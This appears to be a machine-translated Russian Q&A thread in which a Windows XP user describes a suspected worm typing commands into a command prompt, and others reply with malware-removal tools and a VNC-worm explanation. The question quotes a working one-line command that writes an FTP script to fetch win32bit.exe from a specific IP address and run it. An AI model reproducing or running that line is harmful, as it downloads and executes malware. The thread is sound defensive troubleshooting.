Последние два дня я испытываю странное поведение на моем компьютере, которое, как я подозреваю, является вирусом.
Так внезапно, ряд событий клавиатуры принимают участие. Он пытается открыть командную строку и попытаться выполнить следующую строку: del eq&echo open 186.81.185.135 14062 >> eq&echo user 12120 17227 >> eq &echo get win32bit.exe >> eq &echo quit >> eq &ftp -n -s:eq &win32bit.exe &del eq Это Win XP SP3, на которой я работаю, и у меня работает McAfee. Есть ли у кого-нибудь идеи, что бы это было?
1
7 ответов
4
Запустите Malwarebytes Anti-Malware. Вы можете получить это здесь. Вы можете быть в состоянии удалить это с этим. Если нет, то форматирование и перезагрузка - самый быстрый и простой способ очистки системы. Кроме того, хорошая перезагрузка время от времени поддерживает работу операционной системы. Надеюсь, это поможет.
2
если ваш обычный вирусный сканер не обнаруживает угрозу (известную или неизвестную), это не значит, что она ненастоящая. дать ThreatFire попробовать, программа anitvirus , которая не опирается на вирусных сигнатур , а на поведенческом анализе
1
Я бы порекомендовал Spybot Search & Destroy.
Проверьте, что делает ваш сетевой трафик. Вы можете использовать это, чтобы выяснить, является ли это удаленным сеансом или дистанционно управляемым трояном.
Вы также можете следить за тем, какой исполняемый файл запущен в вашем диспетчере задач, основываясь на чтении байтов и записи байтов. Вот как я обнаружил ошибку в моей системе.
1
Сегодня этот IP-адрес кажется динамичным, что кажется странным для его назначения.
$ dig -x 186,81,185,135
[..]
135.185.81.186.in-addr.arpa. 86400 IN PTR Dynamic-IP-18681185135.cable.net.co.
[..]
Однако на самом деле это может быть довольно старым, так что ваш антивирусный сканер действительно работает ...?
РЕДАКТИРОВАТЬ: вчера, поиск 186.81.185.135 дал только 1 результат, сегодня 2 (плюс этот вопрос самого суперпользователя )... Может быть, совсем недавно?
1
Да, ты был скомпрометирован. Если у вас нет опыта для полной диагностики и исправления троянов и руткитов, единственный безопасный способ - переустановить ОС. Повеселись.
Сегодняшние антивирусные инструменты не способны защитить вас от огромного разнообразия и быстрых мутаций распространенных сегодня угроз. Особенно традиционные сканеры на основе подписи в значительной степени бесполезны. Не верьте, что ваша машина чиста только потому, что в системном трее есть маленькая обнадеживающая маленькая иконка, которая съедает половину вашего процессора.
0
Вы, вероятно, настроили VNC, не так ли? И, скорее всего, вы не установили пароль для него, не так ли? Вот как червь пытался проникнуть на ваш компьютер. Хост 186.81.185.135 не имеет значения, поскольку, скорее всего, это еще один бедняга, который не настроил VNC должным образом.
Червь пытается создать скрипт для ftp, чтобы загрузить win32bit.exe и запустить его, когда он будет готов.
Рекомендуется запускать какой-нибудь анти-... сканер, так как трудно определить, успешно он или нет.
0
Обновлена ли ваша система в актуальном состоянии? Было бы неплохо убедиться, что вы получили все последние и самые лучшие результаты от Microsoft, включая средство удаления вредоносных программ за этот месяц. Он может найти и удалить то, что у вас есть. Все вышеперечисленные шпионские инструменты также являются отличными вариантами (мне нравятся Malwarebytes)